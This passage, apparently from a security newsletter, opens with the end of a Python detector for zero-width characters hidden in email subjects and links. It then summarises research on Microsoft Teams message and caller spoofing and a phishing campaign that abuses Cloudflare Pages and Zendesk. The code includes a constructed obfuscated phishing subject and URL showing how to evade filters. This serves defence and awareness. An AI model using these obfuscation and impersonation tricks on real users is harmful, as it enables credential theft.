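SUSPICIOUS_KEYWORDS = ("invoice", "password", "verify", "account")  # constructed list


def is_invisible(ch: str) -> bool:
    return ch in INVISIBLE or unicodedata.category(ch) == "Cf"


def strip_invisible(text: str) -> str:
    """Remove zero-width/format characters so matching sees what the user sees."""
    return "".join(ch for ch in text if not is_invisible(ch))


def count_invisible(text: str) -> int:
    return sum(1 for ch in text if is_invisible(ch))


def analyze(subject: str, url: str, threshold: int = 2) -> dict:
    """Score one message: invisible-character count, cleaned subject/URL,
    keywords that only match once the characters are removed, and a verdict."""
    clean_subject = strip_invisible(subject)
    clean_url = strip_invisible(url)
    hidden_keywords = [
        k for k in SUSPICIOUS_KEYWORDS
        if k in clean_subject.lower() and k not in subject.lower()
    ]
    total = count_invisible(subject) + count_invisible(url)
    return {
        "invisible_count": total,
        "clean_subject": clean_subject,
        "clean_url": clean_url,
        "hidden_keywords": hidden_keywords,
        "suspicious": total >= threshold or bool(hidden_keywords),
    }


# Constructed sample: renders normally, but zero-width characters and a soft hyphen
# split the word "invoice" and the link's host name so naive filters miss them.
SAMPLE_SUBJECT = "Your in\u200bvoice is rea\u00addy"
SAMPLE_URL = "https://login.exam\u200bple\u200c.test/verify"

if __name__ == "__main__":
    print(analyze(SAMPLE_SUBJECT, SAMPLE_URL))
```

The same stripping step, applied before URL rewriting or reputation lookup, is what keeps a safe-link rewriter from truncating or misclassifying the obfuscated link.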
Further Reading: Cybersecurity News
Exploiting Trust in Collaboration: Microsoft Teams Vulnerabilities Uncovered (Check Point Research)
Check Point Research found multiple vulnerabilities in Microsoft Teams that let attackers manipulate conversations and notifications to impersonate colleagues, alter message content silently, and forge caller identities. The flaws exploit trust built into collaboration features—such as message identifiers, conversation topics, and call initiation fields—allowing attackers to mislead recipients without obvious signs of tampering.
Key Insights
Invisible message edits: Attackers can rewrite previously sent messages without triggering the “Edited” label, undermining the integrity of chat history.
Spoofed notifications: Notification fields can be manipulated so alerts appear to originate from trusted executives or colleagues.
Display-name manipulation: Conversation topics in private chats can be changed to alter displayed participant names, misleading recipients about who they’re speaking with.
Forged caller identity: Call initiation fields can be abused to present arbitrary names during audio/video calls, enabling convincing impersonation.
Platform-trust attack surface: Collaboration apps’ built-in trust signals (notifications, display names, edit markers) can be weaponized to bypass user assumptions and social-engineering defenses.
Further Reading: Check Point Research
Phishing Campaign Abuses Cloudflare Services (Cyber Security News)
A new large-scale phishing campaign has been discovered abusing Cloudflare Pages and Zendesk infrastructure to host malicious login portals, leveraging trusted cloud platforms to evade detection and harvest credentials. Over 600 malicious *.pages.dev domains were involved, combined with typosquatted support portals and live chat operators to further trick victims.
Key Insights
Trusted-platform exploitation: Attackers register domains under *.pages.dev (Cloudflare Pages) and use Zendesk hubs to make pages appear legitimate, thereby defeating reputation-based defenses.
Mass-scale credential harvest: More than 600 malicious domains were identified in the campaign, showing rapid registration and deployment of phishing infrastructure.
Live-chat assault vector: In some cases, human operators engaged victims via embedded chat interfaces, requesting phone numbers and convincing them to install remote tools under the guise of “support.”
Technical advance in delivery: The attackers used Google Site Verification and Microsoft Bing Webmaster tokens to validate the fake pages, improving their search legitimacy and SSO-poisoning potential.
Post-compromise escalation: Beyond credential theft, the campaign steered victims into installing legitimate remote-monitoring tools repurposed for malicious access, increasing post-compromise risk.
Further Reading: Cyber Security News
